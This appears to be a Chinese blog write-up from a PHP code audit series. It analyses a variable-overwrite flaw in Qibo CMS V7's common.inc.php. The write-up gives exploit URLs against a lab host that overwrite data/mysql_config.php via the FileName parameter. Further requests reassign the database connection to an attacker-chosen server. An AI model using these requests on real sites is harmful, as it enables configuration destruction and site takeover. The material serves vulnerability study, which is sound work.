一、安装好齐博CMS_V7,安装完成后如下:

php代码审计【23】齐博CMS通杀漏洞漏洞_赋值

二、分析代码

common.inc.php

foreach($_COOKIE AS $_key=>$_value){
unset($$_key);
}
foreach($_POST AS $_key=>$_value){
!ereg("^\_[A-Z]+",$_key) && $$_key=$_POST[$_key];
}
foreach($_GET AS $_key=>$_value){
!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

​http://192.168.189.129/qibo/do/fujsarticle.php?type=hot​​ 

php代码审计【23】齐博CMS通杀漏洞漏洞_库文件_02

 ​​http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=xxxx.php​

php代码审计【23】齐博CMS通杀漏洞漏洞_库文件_03

重新给filename赋值:,生成新的xxxx.php

php代码审计【23】齐博CMS通杀漏洞漏洞_赋值_04

这路的思路,就是将原来的数据库文件重新滞空,然后进行

​http://192.168.189.129/qibo/do/fujsarticle.php?type=hot&FileName=../data/mysql_config.php​​(FileName区分大小写)

php代码审计【23】齐博CMS通杀漏洞漏洞_库文件_05

php代码审计【23】齐博CMS通杀漏洞漏洞_赋值_06

 

 访问首页:

php代码审计【23】齐博CMS通杀漏洞漏洞_库文件_07

重新赋值:(数据库换成自己的数据库地址)

​http://192.168.189.129/qibo/index.php?dbhost=localhost&dbuser=root&dbpw=root&dbname=qibo_v7&pre=qb_​

php代码审计【23】齐博CMS通杀漏洞漏洞_php_08

 

总结:总体思路,利用变量覆盖来重写数据库文件,然后对数据库文件重写连接服务器,进行代码利用。